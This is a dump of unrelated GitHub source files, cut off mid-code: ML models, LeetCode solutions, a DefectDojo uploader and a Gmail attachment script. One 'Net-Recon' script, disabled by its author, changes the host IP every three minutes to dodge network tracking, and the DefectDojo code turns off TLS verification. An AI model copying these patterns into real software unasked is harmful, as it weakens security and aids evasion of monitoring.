Loads by name so doesn't have to match.\n \"\"\"\n self.image_input = None\n self.encoder = None\n self.decoder = None\n self.ae = None\n\n # Params\n self.image_shape = image_shape\n self.block_type = block_type\n\n self.image_input = None\n self.encoder = None\n self.decoder = None\n self.ae = None\n\n self.activation_cfg = activation_cfg\n self.conv_filters = conv_filters\n self.downsampling = downsampling\n self.batch_norm = batch_norm\n self.latent_dim = latent_dim\n self.lr = lr\n self.loss = loss\n\n self.encoder_weights = encoder_weights\n self.generator_weights = generator_weights\n\n def create_encoder(self, weights_path=None):\n \"\"\"Creates the encoder\n\n Args:\n weights_path (str): Path to the weights of the model (loaded via name).\n\n Returns:\n Model: The image encoder model\n\n \"\"\"\n # img_input = Input(tuple(self.image_shape), name=\"img_input\")\n\n model_prefix = 'encoder/'\n\n # m = img_input\n m = self.image_input\n\n for i,ft in enumerate(self.conv_filters):\n if self.block_type == 'plain':\n m = conv_block_downsample(m, ft, downsampling=self.downsampling, batch_norm=self.batch_norm, activation_cfg=self.activation_cfg, name_prefix=model_prefix + 'conv_block_%d/'%i)\n elif self.block_type == 'inception':\n m = inception_block(m, ft, activation_cfg=self.activation_cfg, batch_norm=self.batch_norm, name_prefix=model_prefix + 'inception_block_%d/'%i)\n m = MaxPooling2D(name=model_prefix + 'max_pool_%d' %i)(m)\n elif self.block_type == 'inception_downsample':\n m = inception_downsample(m, ft, activation_cfg=self.activation_cfg, batch_norm=self.batch_norm, name_prefix=model_prefix + 'inception_block_%d/'%i)\n elif self.block_type == 'resnet_inception':\n m = resnet_inception_block(m, ft, activation_cfg=self.activation_cfg, batch_norm=self.batch_norm, name_prefix=model_prefix + 'resnet_block_%d/'%i)\n m = MaxPooling2D(name=model_prefix + 'max_pool_%d'%i)(m)\n else:\n raise ValueError(\"Block type (%s) not implemented\"%self.block_type)\n\n m = Flatten()(m)\n\n z = Dense(self.latent_dim, name=model_prefix+'z')(m)\n\n encoder = Model(self.image_input, z, name='encoder')\n\n if weights_path:\n encoder.load_weights(weights_path, by_name=True, skip_mismatch=True)\n\n return encoder\n\n def create_generator(self, weights_path=None, solo=False):\n \"\"\"\n Creates the generator, (also the decoder). 
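It maps a latent vector of size latent_dim back to an image tensor. 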
Calling it the generator for consistency with GAN models.\n\n Args:\n weights_path (str): Path to the weights of the model (loaded via name).\n solo (str): Path to the weights of the model (loaded via name).\n\n Returns:\n (Model): The generator\n \"\"\"\n\n last_conv_shape = (self.image_shape[0] // (2 ** len(self.conv_filters)), self.image_shape[1] // (2 ** len(self.conv_filters)), 3)\n\n model_prefix = 'image/generator/'\n\n zi = Input((self.latent_dim,), name=model_prefix+'zi')\n m = zi\n m = Dense(np.prod(last_conv_shape))(m)\n m = activation_function(m, self.activation_cfg)\n m = Reshape(last_conv_shape)(m)\n\n for i,ft in enumerate(self.conv_filters[::-1]):\n if self.block_type == 'plain':\n m = deconv_block_upsample(m, ft, batch_norm=self.batch_norm, name_prefix=model_prefix + 'conv_block_%d/'%i)\n elif self.block_type == 'inception':\n m = UpSampling2D(name=model_prefix+'upsample_%d'%i)(m)\n m = inception_block(m, ft, activation_cfg=self.activation_cfg, batch_norm=self.batch_norm, name_prefix=model_prefix + 'inception_block_%d/'%i)\n elif self.block_type == 'inception_downsample':\n m = UpSampling2D(name=model_prefix+'upsample_%d'%i)(m)\n m = inception_downsample(m, ft, activation_cfg=self.activation_cfg, batch_norm=self.batch_norm, name_prefix=model_prefix + 'inception_block_%d/'%i)\n elif self.block_type == 'resnet_inception':\n m = UpSampling2D(name=model_prefix+'upsample_%d'%i)(m)\n m = resnet_inception_block(m, ft, activation_cfg=self.activation_cfg, batch_norm=self.batch_norm, name_prefix=model_prefix + 'resnet_block_%d/'%i)\n else:\n raise ValueError(\"Block type (%s) not implemented\" % self.block_type)\n\n generated = Conv2D(self.image_shape[2], kernel_size=(1, 1), padding='same', activation='tanh', name=model_prefix + 'generated_output')(m)\n\n generator = Model(zi, generated, name='generator')\n\n if weights_path:\n generator.load_weights(weights_path, by_name=True, skip_mismatch=True)\n\n return generator\n\n\n def build_autoencoder(self):\n \"\"\"\n Creates the autoencoder model\n Returns:\n None\n \"\"\"\n self.image_input = Input(self.image_shape)\n\n self.encoder = self.create_encoder(self.encoder_weights)\n self.decoder = self.create_generator(self.generator_weights)\n self.ae = Model(self.image_input, self.decoder(self.encoder(self.image_input)), name='autoencoder')\n\n adam = optimizers.Adam(lr=self.lr)\n self.ae.compile(adam, loss=self.loss)\n\n","repo_name":"jacksonhshields/habitat-modelling-export","sub_path":"habitat_modelling/ml/keras/models/autoencoder.py","file_name":"autoencoder.py","file_ext":"py","file_size_in_byte":7961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"10943036310","text":"from __future__ import print_function\nimport argparse\nimport json\nfrom src.factories.factory_evaluator import EvaluatorFactory\nfrom src.factories.factory_data_io import DataIOFactory\nfrom src.factories.factory_tagger import TaggerFactory\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Run trained model')\n parser.add_argument('load', help='Path to load from the trained model.',\n default='pretrained/tagger_NER_BiLSTMCNNCRF.hdf5')\n parser.add_argument('input', help='Input CoNNL filename.')\n parser.add_argument('--output', '-o', help='Output JSON filename.',\n default='out.json')\n parser.add_argument('--data-io', '-d', choices=['connl-ner-2003',\n 'connl-pe',\n 'connl-wd'],\n default='connl-ner-2003', help='Data read file format.')\n parser.add_argument('--evaluator', 
'-v', default='f1-connl',\n                        help='Evaluation method.',\n                        choices=['f1-connl', 'f1-alpha-match-10',\n                                 'f1-alpha-match-05', 'f1-macro', 'f05-macro',\n                                 'token-acc'])\n    parser.add_argument('--gpu', '-g', type=int, default=0,\n                        help='GPU device number, 0 by default, -1 means CPU.')\n    print('Start run_tagger.py.')\n    args = parser.parse_args()\n    # Load tagger model\n    tagger = TaggerFactory.load(args.load, args.gpu)\n    # Create DataIO object\n    data_io = DataIOFactory.create(args)\n    # Read data in CoNNL-2003 file format\n    word_sequences, targets_tag_sequences_test = \\\n        data_io.read_data(args.input)\n    # Create evaluator\n    evaluator = EvaluatorFactory.create(args)\n    # Get tags as sequences of strings\n    output_tag_sequences_test = tagger.predict_tags_from_words(word_sequences,\n                                                               batch_size=100)\n    test_score, test_msg = \\\n        evaluator.get_evaluation_score(targets_tag_sequences=targets_tag_sequences_test,\n                                       outputs_tag_sequences=output_tag_sequences_test,\n                                       word_sequences=word_sequences)\n    # Show the evaluation results\n    print('\\n\\n%s = %1.2f' % (args.evaluator, test_score))\n    print(test_msg)\n    # Write results to a JSON file\n    with open(args.output, 'w') as f:\n        json.dump(output_tag_sequences_test, f)\n    print('\\nThe end.')\n","repo_name":"achernodub/targer","sub_path":"run_tagger.py","file_name":"run_tagger.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","stars":249,"dataset":"github-code","pt":"29"} +{"seq_id":"29779005338","text":"import torch\nfrom time import perf_counter\nfrom torch import nn, optim\nimport mars_comm\n\nx = torch.unsqueeze(torch.linspace(-3,3, 1000), dim=1)\ny = x + 1.2*torch.rand(x.size())\n\nclass LR(nn.Module):\n    def __init__(self):\n        super(LR, self).__init__()\n        self.linear = nn.Linear(1,1)\n\n    def forward(self, x):\n        out = self.linear(x)\n        return out\n\nif mars_comm.CUDA:\n    LR_model = LR().cuda()\n    inputs = x.cuda()\n    target = y.cuda()\nelse:\n    LR_model = LR()\n    inputs = x\n    target = y\n\ncriterion = nn.MSELoss()\noptimizer = optim.SGD(LR_model.parameters(), lr=1e-2)\n\ndef train(model, criterion, optimizer, epochs):\n    for epoch in range(epochs):\n        output = model(inputs)\n        loss = criterion(output, target)\n        optimizer.zero_grad()\n        loss.backward()\n        optimizer.step()\n        #if epoch % 1000 == 0:\n        #    mars_comm.draw(output, loss)\n    return model, loss\n\nstart = perf_counter()\nw, loss = train(LR_model, criterion, optimizer, 1000)\nfinish = perf_counter()\ntime = finish - start\nprint(\"Elapsed time: %s\" % time)\nprint(\"final loss:\", loss.item())\nprint(\"weights:\", list(LR_model.parameters()))\n","repo_name":"seaside-play/technical-summary","sub_path":"machine_learning/deeplearning/pytorch/test_nn.py","file_name":"test_nn.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"23258727953","text":"class Solution:\n    def findMedianSortedArrays(self, nums1, nums2):\n        \"\"\"\n        First, consider how to find the k-th smallest element of two sorted lists, i.e. the getKth(A, B, k) function below.\n        An example: A = {1,3,5,7}; B = {2,4,6,8,9,10}. To find the 7th smallest element: A has 4 elements and B has 6;\n        k/2 = 7/2 = 3, the 3rd element of A is A[2]=5 and the 3rd element of B is B[2]=6. Since A[2] < B[2], the first\n        3 elements of A are all guaranteed to rank below the 7th smallest value overall, so they can be discarded and\n        we recurse to find the (7-3)=4th smallest element of the remaining lists. Each step discards about k/2\n        candidates, which gives the required logarithmic running time.\n        \"\"\"\n        A, B = nums1, nums2\n        total = len(A) + len(B)\n        if total % 2 == 1:\n            return float(self.getKth(A, B, total // 2 + 1))\n        return (self.getKth(A, B, total // 2) + self.getKth(A, B, total // 2 + 1)) * 0.5\n\n    def getKth(self, A, B, k):\n        lenA, lenB = len(A), len(B)\n        if lenA > lenB:\n            return self.getKth(B, A, k)\n        if lenA == 0:\n            return B[k - 1]\n        if k == 1:\n            return min(A[0], B[0])\n        pa = min(k // 2, lenA)\n        pb = k - pa\n        if A[pa - 1] < B[pb - 1]:\n            return self.getKth(A[pa:], B, pb)\n        else:\n            return self.getKth(A, B[pb:], pa)\n\n\n        \"\"\"\n        num = nums1 + nums2\n        # The time complexity for sorted is O((m+n)log(m+n)) but 
the question requires O(log(m+n))\n num = sorted(num)\n n = len(num)\n if n % 2 == 0:\n return float((num[n // 2 - 1] + num[n // 2])) * 0.5\n return float(num[n // 2])\n \"\"\"\n\nif __name__ == \"__main__\":\n nums1 = [1, 3]\n nums2 = [2]\n\n s = Solution()\n print(s.findMedianSortedArrays(nums1, nums2))\n\n","repo_name":"codingyen/CodeAlone","sub_path":"Python/0004_median_of_two_sorted_arrays.py","file_name":"0004_median_of_two_sorted_arrays.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"3552584107","text":"# uses ifconfig to change ip to a random ip on the subnet,\n# bound by the randrange(x) as y.y.y.1 - y.y.y.x\n# time.sleep(3*60) means it waits 3 minutes between changing\n\nassert False, \"Delete this line to agree to the MIT license this code was released under\"\n\nimport os\nimport random\nimport time\nexit()\ninterface = 'tap0'\nprefix_ip = '10.8.0.'\nwhile 1:\n os.system('clear')\n os.system('ifconfig ' + interface + ' '+ prefix_ip + str(random.randrange(80)+1) + '/24')\n os.system('ifconfig ' + interface)\n time.sleep(3*60)\n","repo_name":"ChristopherMorrison/Net-Recon","sub_path":"Misc_Scipts/Randomize_IP.py","file_name":"Randomize_IP.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"72928143117","text":"import torch as tc\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom .lstm import LSTM\nimport pdb\n\nclass StringEncoder(nn.Module):\n\tdef __init__(self , embed_layer , d_model , dropout = 0.0):\n\t\tsuper().__init__()\n\n\t\tself.d_model = d_model\n\n\t\tself.emb = embed_layer\n\t\tself.emb_drop = nn.Dropout(dropout)\n\n\t\tself.lstm = LSTM(d_model , d_model // 2 , 1 , True , dropout = dropout)\n\n\tdef forward(self , ent_names, ent_lens):\n\t\t'''\n\t\t\tent_names: \t(num_ent , name_len)\n\t\t\tent_lens : (num_ent)\n\t\t'''\n\t\tbsz , d_model = len(ent_lens) , self.d_model\n\n\t\ty = self.emb_drop(self.emb(ent_names))\n\t\ty = self.lstm(y , lens = ent_lens)[1].view(bsz , d_model)\n\n\t\treturn y\n\nclass EntitySelector(nn.Module):\n\tdef __init__(self , d_model , give_me_result = False):\n\t\tsuper().__init__()\n\t\tself.d_model = d_model\n\t\tself.WQ = nn.Linear(d_model , d_model)\n\t\tself.WK = nn.Linear(d_model , d_model)\n\n\t\tself.give_me_result = give_me_result\n\n\t\tif give_me_result:\n\t\t\tself.WV = nn.Linear(d_model , d_model)\n\t\t\tself.WO = nn.Linear(d_model , d_model)\n\t\t\tself.l_norm = nn.LayerNorm(d_model)\n\t\t\n\tdef forward(self , query , ent_emb , ent_idx_in_batch , max_entity_number):\n\t\t'''\n\t\t\tquery: (bsz , len , d_model)\n\t\t\tent_emb: (num_ent , d_model)\n\n\t\t\tent_idx_in_batch: form graph nodes of entitys to shape (bsz , n_ent_b) , None if bsz = 1\n\t\t'''\n\n\t\tbsz , d_model = query.size(0) , self.d_model\n\t\tquery = query.view(bsz , -1 , d_model)\n\t\ty_len = query.size(1)\n\n\t\tif ent_idx_in_batch is not None:\n\t\t\tn_ent_b = ent_idx_in_batch.size(1)\n\t\t\tmask = (ent_idx_in_batch != -1).float().view(bsz , n_ent_b , 1).requires_grad_(False)\n\t\t\tent_emb = ent_emb[ent_idx_in_batch]\n\t\telse:\n\t\t\tassert bsz == 1\n\t\t\tn_ent_b = ent_emb.size(0)\n\t\t\tmask = ent_emb.new_ones(1 , n_ent_b , 1).float().requires_grad_(False)\n\t\t\tent_emb = ent_emb.view(1 , n_ent_b , d_model)\n\n\t\tq = self.WQ(query)\n\t\tent = self.WK(ent_emb) * mask #(bsz , n_ent_b , d_model)\n\n\t\t#pdb.set_trace()\n\n\t\tweight = 
(q.view(bsz,y_len,1,d_model) * ent.view(bsz,1,n_ent_b,d_model)).sum(-1) #(bsz , y_len , n_ent_b)\n\t\tweight -= (1-mask.view(bsz,1,n_ent_b)) * 100000\n\t\tweight = F.softmax(weight , dim = -1) #(bsz , y_len , n_ent_b)\n\n\t\t#if need result, make a weighted sum\n\t\tif self.give_me_result:\n\t\t\tv = self.WK(ent_emb) * mask #(bsz , n_ent_b , d_model)\n\t\t\tweight = weight.view(bsz , y_len , 1 , n_ent_b)\n\t\t\tv = v.view(bsz , 1 , n_ent_b , d_model)\n\t\t\tv = tc.matmul(weight * (d_model**-0.5) , v).view(bsz , y_len , d_model)\n\t\t\tv = self.l_norm(self.WO(v))\n\t\t\treturn v\n\n\t\t#else, make weight padded and return it\n\t\tif n_ent_b < max_entity_number:\n\t\t\tweight = tc.cat([weight , weight.new_zeros(bsz , y_len , max_entity_number - n_ent_b)] , dim = -1)\n\n\t\treturn weight","repo_name":"FFTYYY/GraphWriter","sub_path":"graphwriter/other_layers.py","file_name":"other_layers.py","file_ext":"py","file_size_in_byte":2666,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"29"} +{"seq_id":"4125314697","text":"import asyncio\nimport json\nimport tempfile\nfrom datetime import date\nfrom pprint import pformat\nfrom typing import List, Tuple, cast\nfrom urllib.parse import urlparse\n\nimport requests\nimport yarl\nfrom pydantic import AnyUrl, BaseModel\n\nimport app.secbot.inputs.gitlab.handlers.defectdojo.api as defectdojo\nfrom app.secbot import logger\nfrom app.secbot.inputs.gitlab.schemas import AnyGitlabModel\nfrom app.secbot.inputs.gitlab.schemas.output_responses import OutputFinding\nfrom app.secbot.schemas import Severity\n\nWORKER_TO_SCAN_TYPE_MAPPER = {\n \"gitleaks\": \"Gitleaks Scan\",\n}\n\n\nclass OutputResultObject(BaseModel):\n data: AnyGitlabModel\n worker: str\n result: str\n\n\nclass DefectDojoCredentials(BaseModel):\n url: AnyUrl\n secret_key: str\n user: str\n lead_id: int\n\n\ndef handle_dd_response(resp, context=\"\", raise_on_error=True):\n if (\n resp.response_code not in (200, 201)\n or resp.success is not True\n or isinstance(resp.data, str)\n ):\n if context:\n context = f\", context: {context}\"\n error_msg = (\n f\"[!] Error. Message: {resp.message}. \"\n f\"Status_code: {resp.response_code}, data: {pformat(resp.data)}, {context}\"\n )\n if raise_on_error:\n raise RuntimeError(error_msg)\n if isinstance(resp.data, dict) or isinstance(resp.data, list):\n return resp.data\n try:\n return json.loads(resp.data)\n except Exception:\n return {\"error\": str(resp.data)}\n # return json data if everything is good\n return resp.data\n\n\nasync def dd_prepare(\n credentials: DefectDojoCredentials,\n product_type: str,\n product_name: str,\n product_description: str,\n repo_url: AnyUrl,\n name: str,\n commit_hash: str,\n description: str,\n):\n dd = defectdojo.DefectDojoAPIv2(\n credentials.url,\n credentials.secret_key,\n credentials.user,\n debug=False,\n timeout=360,\n )\n # Check if product type already exists. 
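It is looked up by name via list_products_type below.\n # 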
Create one if it doesn't exist\n product_type_dd = await dd.list_products_type(name=product_type)\n product_type_dd_parsed = handle_dd_response(product_type_dd, product_type)\n product_types = cast(List[dict], product_type_dd_parsed[\"results\"])\n if len(product_types) > 0:\n product_types = [pt for pt in product_types if pt[\"name\"] == product_type]\n if len(product_types) > 0:\n product_type_id = product_types[0][\"id\"]\n logger.info(\n f\"[x] Product type '{product_type}' already exists, getting the first one (#{product_type_id})\"\n )\n else:\n # product type is being created with a direct API call due to the absence of an appropriate\n # wrapper method in defectdojo_apiv2\n try:\n logger.info(f\"[x] Create product type {product_type}\")\n # todo: async\n response = requests.post(\n f\"{credentials.url}/api/v2/product_types/\",\n headers={\"Authorization\": f\"Token {credentials.secret_key}\"},\n json={\"name\": product_type},\n verify=False,\n )\n response.raise_for_status()\n product_type_id = response.json()[\"id\"]\n except Exception:\n logger.info(f'[!] Error. Cannot create product type \"{product_type}\"')\n raise\n\n # Check if product already exists. Create one if it doesn't exist\n product_dd = await dd.list_products(name=product_name)\n product_dd_parsed = handle_dd_response(product_dd, product_name)\n products = cast(List[dict], product_dd_parsed[\"results\"])\n if len(products) > 0:\n products = [\n product\n for product in products\n if product[\"name\"] == product_name\n and product[\"prod_type\"] == product_type_id\n ]\n if len(products) > 0:\n product_id = products[0][\"id\"]\n logger.info(\n f\"[x] Product '{product_name}' already exists, getting the first one (#{product_id})\"\n )\n else:\n # create product if it doesn't exist\n logger.info(f\"[x] Create product {product_name}\")\n product = await dd.create_product(\n product_name,\n product_description,\n product_type_id,\n )\n product = handle_dd_response(product, product_name)\n product_id = product[\"id\"]\n\n engagement_dd = await dd.list_engagements(name=name)\n engagement_dd_parsed = handle_dd_response(engagement_dd, name)\n engagements = cast(List[dict], engagement_dd_parsed[\"results\"])\n if len(engagements) > 0:\n engagements = [\n engagement\n for engagement in engagements\n if engagement[\"name\"] == name and engagement[\"product\"] == product_id\n ]\n if len(engagements) > 0:\n engagement_id = engagements[0][\"id\"]\n engagement_name = engagements[0][\"name\"]\n logger.info(\n f\"[x] Engagement '{engagement_name}' already exists, getting the first one (#{engagement_id})\"\n )\n else:\n # create the engagement if we didn't find one\n engagement_data = {\n \"name\": f\"{name}\",\n \"product_id\": product_id,\n \"lead_id\": credentials.lead_id,\n \"status\": \"Completed\",\n \"target_start\": f'{date.today().strftime(\"%Y-%m-%d\")}',\n \"target_end\": f'{date.today().strftime(\"%Y-%m-%d\")}',\n \"engagement_type\": \"CI/CD\",\n \"deduplication_on_engagement\": False,\n \"build_id\": f\"{name}\",\n \"commit_hash\": f\"{commit_hash}\",\n \"description\": f\"Latest commit by {description}\",\n \"source_code_management_uri\": f\"{repo_url}\",\n }\n\n engagement = await dd.create_engagement(\n name=engagement_data[\"name\"],\n product_id=engagement_data[\"product_id\"],\n lead_id=engagement_data[\"lead_id\"],\n status=engagement_data[\"status\"],\n target_start=engagement_data[\"target_start\"],\n target_end=engagement_data[\"target_end\"],\n engagement_type=engagement_data[\"engagement_type\"],\n 
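# NOTE: engagement_data sets deduplication_on_engagement to False above, so DefectDojo is expected to deduplicate these findings at the product level rather than per engagement\n 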
deduplication_on_engagement=engagement_data[\"deduplication_on_engagement\"],\n build_id=engagement_data[\"build_id\"],\n commit_hash=engagement_data[\"commit_hash\"],\n description=engagement_data[\"description\"],\n source_code_management_uri=engagement_data[\"source_code_management_uri\"],\n )\n engagement = handle_dd_response(engagement, name)\n engagement_name = engagement[\"name\"]\n engagement_id = engagement[\"id\"]\n logger.info(f\"[x] Engagement was created: {engagement_name} #{engagement_id}\")\n logger.info(f\"[x] Check product at {credentials.url}/product/{product_id}\")\n logger.info(\n f\"[x] Check engagement at {credentials.url}/engagement/{engagement_id}\"\n )\n return engagement_id\n\n\nasync def dd_upload(\n credentials: DefectDojoCredentials,\n engagement_id,\n scan_type,\n report_file,\n tag: str,\n minimum_severity=\"High\",\n):\n dd = defectdojo.DefectDojoAPIv2(\n credentials.url,\n credentials.secret_key,\n credentials.user,\n debug=False,\n timeout=360,\n )\n # scan_type - e.g. Nuclei Scan\n valid_scan_type = WORKER_TO_SCAN_TYPE_MAPPER.get(scan_type, scan_type)\n upload_data = {\n \"engagement_id\": f\"{engagement_id}\",\n \"scan_type\": f\"{valid_scan_type}\",\n \"file\": f\"{report_file}\",\n \"active\": True,\n \"verified\": False,\n \"close_old_findings\": False,\n \"skip_duplicates\": False,\n \"scan_date\": f'{date.today().strftime(\"%Y-%m-%d\")}',\n \"minimum_severity\": f\"{minimum_severity}\",\n }\n upload = await dd.upload_scan(\n engagement_id=upload_data[\"engagement_id\"],\n scan_type=upload_data[\"scan_type\"],\n file=upload_data[\"file\"],\n active=upload_data[\"active\"],\n verified=upload_data[\"verified\"],\n close_old_findings=upload_data[\"close_old_findings\"],\n skip_duplicates=upload_data[\"skip_duplicates\"],\n scan_date=upload_data[\"scan_date\"],\n minimum_severity=upload_data[\"minimum_severity\"],\n tags=tag, # list of tags, but we will use only commit hash id\n )\n if not upload.success:\n raise RuntimeError(upload.data)\n return upload\n\n\nasync def dd_findings_by_test(credentials: DefectDojoCredentials, test_id: int):\n dd = defectdojo.DefectDojoAPIv2(\n credentials.url,\n credentials.secret_key,\n credentials.user,\n debug=False,\n timeout=360,\n )\n findings = await dd.list_findings(\n active=\"true\",\n duplicate=\"false\",\n test_id_in=[test_id],\n # NOTE(ivan.zhirov): Temporary solution before the pagination system\n # will be added\n # TODO(ivan.zhirov): Implement proper pagination\n limit=500,\n )\n return handle_dd_response(findings, str(test_id))\n\n\nasync def dd_get_test(\n credentials: DefectDojoCredentials,\n test_id: int,\n):\n dd = defectdojo.DefectDojoAPIv2(\n credentials.url,\n credentials.secret_key,\n credentials.user,\n debug=False,\n timeout=360,\n )\n test = await dd.get_test(test_id)\n test = handle_dd_response(test, str(test_id))\n return test\n\n\nasync def send_result(\n credentials: DefectDojoCredentials,\n output_result: OutputResultObject,\n) -> Tuple[int, List[OutputFinding]]:\n web_url = output_result.data.project.web_url\n product_type = urlparse(web_url).hostname\n product_name = output_result.data.project.path_with_namespace\n commit_hash = output_result.data.commit.id\n eng_id = await dd_prepare(\n credentials,\n product_type=product_type,\n product_name=product_name,\n product_description=web_url,\n repo_url=output_result.data.commit.url.replace(\"/-/commit/\", \"/-/blob/\"),\n name=yarl.URL(output_result.data.path).path,\n commit_hash=commit_hash,\n 
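# the commit author's email passed here becomes the engagement description (\"Latest commit by ...\") in dd_prepare\n 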
description=output_result.data.commit.author.email,\n )\n with tempfile.NamedTemporaryFile(prefix=\"dd_output_\") as tmp_file:\n with open(tmp_file.name, \"wb\") as tmp_file_write:\n tmp_file_write.write(output_result.result.encode())\n\n test_upload = await dd_upload(\n credentials,\n engagement_id=eng_id,\n scan_type=output_result.worker,\n report_file=tmp_file.name,\n tag=commit_hash,\n )\n test_upload_id = test_upload.data[\"test_id\"]\n for i in range(30):\n test = await dd_get_test(credentials, test_upload_id)\n if test[\"percent_complete\"] == 100:\n break\n await asyncio.sleep(10)\n else:\n raise RuntimeError(\n f\"Took too much time to handle the output, test_id={test_upload_id}\"\n )\n\n await asyncio.sleep(120) # wait for deduplication\n\n response = await dd_findings_by_test(credentials, test_upload_id)\n findings = [\n OutputFinding(\n # todo: do smth with types\n title=finding[\"title\"],\n severity=Severity(finding[\"severity\"]),\n url=str(\n yarl.URL(credentials.url).with_path(f\"finding/{str(finding['id'])}\")\n ),\n )\n for finding in response[\"results\"]\n ]\n return test_upload_id, findings\n","repo_name":"exness/security-bot","sub_path":"app/secbot/inputs/gitlab/handlers/defectdojo/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":11365,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"29"} +{"seq_id":"22041285065","text":"from collections import Counter\n\n\nclass Solution:\n def checkInclusion(self, s1: str, s2: str) -> bool:\n # sliding window to check if all s1 chars are in substring of s2\n left = 0\n cnts = Counter(s1)\n for right, char in enumerate(s2):\n if char in cnts and cnts[char] > 0:\n cnts[char] -= 1\n else:\n while s2[left] != char:\n cnts[s2[left]] += 1\n left += 1\n left += 1\n \n if right - left + 1 == len(s1):\n return True\n \n return False\n\ns1 = \"xyz\"\ns2 = \"xyyzx\"\nprint(Solution().checkInclusion(s1, s2))","repo_name":"hiroto0222/CodeQuestions","sub_path":"LeetCode/medium/567.py","file_name":"567.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"19745165537","text":"from __future__ import print_function\n\nimport mimetypes\nimport pickle\nimport os.path\nfrom email.mime.audio import MIMEAudio\nfrom email.mime.base import MIMEBase\nfrom email.mime.image import MIMEImage\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\n\nfrom googleapiclient.discovery import build\nfrom google_auth_oauthlib.flow import InstalledAppFlow\nfrom google.auth.transport.requests import Request\n\nimport subprocess\nimport base64\nimport email\nimport time\nfrom datetime import datetime\n\n# If modifying these scopes, delete the file token.pickle.\nSCOPES = ['https://www.googleapis.com/auth/gmail.modify']\n\n\ndef run_shell_script(name):\n try:\n subprocess.call([\"sh\", name], stderr=subprocess.PIPE, stdout=subprocess.PIPE)\n except Exception as error:\n print('An error occurred: %s' % error)\n\n\ndef get_feedback(name):\n try:\n f = open(name, \"r\")\n text = f.read()\n f.close()\n return text\n except Exception as error:\n print('An error occurred: %s' % error)\n return None\n\n\ndef get_msg_all(service, user_id):\n try:\n return service.users().messages().list(userId=user_id).execute()\n except Exception as error:\n print('An error occurred: %s' % error)\n return None\n\n\ndef get_msg(service, user_id, msg_id):\n try:\n return 
service.users().messages().get(userId=user_id, id=msg_id, format='metadata').execute()\n except Exception as error:\n print('An error occurred: %s' % error)\n return None\n\n\ndef load_attachments(service, user_id, msg_id, store_dir):\n try:\n message = service.users().messages().get(userId=user_id, id=msg_id).execute()\n for part in message['payload']['parts']:\n if(part['filename'] and part['body'] and part['body']['attachmentId']):\n attachment = service.users().messages().attachments().get(id=part['body']['attachmentId'], userId=user_id, messageId=msg_id).execute()\n file_data = base64.urlsafe_b64decode(attachment['data'].encode('utf-8'))\n path = ''.join([store_dir, part['filename']])\n f = open(path, 'wb')\n f.write(file_data)\n f.close()\n except Exception as error:\n print('An error occurred: %s' % error)\n\n\ndef find_msg_ids(service, subject):\n try:\n msg_all = get_msg_all(service, 'me').get('messages')\n msg_id_list = []\n for msg_info in msg_all:\n msg_id = msg_info.get('id')\n msg = get_msg(service, 'me', msg_id)\n label_ids = msg.get('labelIds')\n if label_ids[0] != 'UNREAD':\n continue\n payload = msg.get('payload')\n headers = payload.get('headers')\n for info in headers:\n if info.get('name') == 'Subject' and info.get('value') == subject:\n msg_id_list.append(msg_id)\n return msg_id_list\n except Exception as error:\n print('An error occurred: %s' % error)\n return None\n\n\ndef find_sender_email(service, msg_id):\n try:\n msg = get_msg(service, 'me', msg_id)\n payload = msg.get('payload')\n headers = payload.get('headers')\n for info in headers:\n if info.get('name') == 'Return-Path':\n return info.get('value')\n return None\n except Exception as error:\n print('An error occurred: %s' % error)\n return None\n\n\ndef create_msg(sender, to, subject, message_text):\n \"\"\"Create a message for an email.\n\n Args:\n sender: Email address of the sender.\n to: Email address of the receiver.\n subject: The subject of the email message.\n message_text: The text of the email message.\n\n Returns:\n An object containing a base64url encoded email object.\n \"\"\"\n message = MIMEText(message_text)\n message['to'] = to\n message['from'] = sender\n message['subject'] = subject\n raw_message = base64.urlsafe_b64encode(message.as_string().encode(\"utf-8\"))\n return {'raw': raw_message.decode(\"utf-8\")}\n\n\ndef create_msg_with_attachment(sender, to, subject, message_text, file):\n \"\"\"Create a message for an email.\n\n Args:\n sender: Email address of the sender.\n to: Email address of the receiver.\n subject: The subject of the email message.\n message_text: The text of the email message.\n file: The path to the file to be attached.\n\n Returns:\n An object containing a base64url encoded email object.\n \"\"\"\n message = MIMEMultipart()\n message['to'] = to\n message['from'] = sender\n message['subject'] = subject\n\n msg = MIMEText(message_text)\n message.attach(msg)\n\n content_type, encoding = mimetypes.guess_type(file)\n\n if content_type is None or encoding is not None:\n content_type = 'application/octet-stream'\n\n main_type, sub_type = content_type.split('/', 1)\n\n if main_type == 'text':\n fp = open(file, 'rb')\n msg = MIMEText(fp.read().decode(\"utf-8\"), _subtype=sub_type)\n fp.close()\n elif main_type == 'image':\n fp = open(file, 'rb')\n msg = MIMEImage(fp.read(), _subtype=sub_type)\n fp.close()\n elif main_type == 'audio':\n fp = open(file, 'rb')\n msg = MIMEAudio(fp.read(), _subtype=sub_type)\n fp.close()\n else:\n fp = open(file, 'rb')\n msg = MIMEBase(main_type, 
